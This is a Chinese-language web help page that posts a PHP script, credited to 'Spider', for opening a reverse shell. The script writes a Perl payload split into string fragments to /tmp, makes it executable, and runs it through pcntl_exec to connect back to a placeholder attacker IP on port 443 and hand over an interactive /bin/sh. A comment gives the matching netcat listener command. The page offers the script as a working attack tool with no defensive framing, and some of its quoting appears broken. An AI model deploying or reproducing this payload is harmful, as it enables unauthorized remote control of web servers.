梦飞数据中心 > 帮助中心 > 网络技术 > PHP利用pcntl_exec反弹SHELL的脚本

PHP利用pcntl_exec反弹SHELL的脚本

 <?php 

/*******************************  *查察phpinfo编译参数--enable-pcntl  *作者 Spider  *nc -vvlp 443 ********************************/   $ip = 'xxx.xxx.xxx.xxx'; $port = '443'; $file = '/tmp/bc.pl';   header("content-Type: text/html; charset=gb2312");   if(function_exists('pcntl_exec')) {         $data = "#!/usr/bin/perl -w # ".                 " use strict; use ".                 "Socket; use IO::Handle".                 "; my $remote_ip = '".$ip.                 "'; my $remote_port = '".$port.                 "'; my $proto = getpr".                 "otobyname("tcp"); my $".                 "pack_addr = sockaddr_in".                 "($remote_port, inet_ato".                 "n($remote_ip)); my $sh".                 "ell = '/bin/sh -i'; so".                 "cket(SOCK, AF_INET, SOC".                 "K_STREAM, $proto); STD".                 "OUT->autoflush(1); SOC".                 "K->autoflush(1); conne".                 "ct(SOCK,$pack_addr) or ".                 "die "can not connect:$!".                 ""; open STDIN, "<&SOCK".                 ""; open STDOUT, ">&SOC".                 "K"; open STDERR, ">&SO".                 "CK"; system($shell); ".                 "close SOCK; exit 0; ";         $fp = fopen($file,'w');         $key = fputs($fp,$data);         fclose($fp);         if(!$key) exit('写入'.$file.'失败');         chmod($file,0777);         pcntl_exec($file);         unlink($file); } else {         echo '不支持pcntl扩展'; } ?>,域名注册

(责任编辑:joker) 部分网站内容及图片来源于网络,如有侵权或违规内容请联系管理员删除!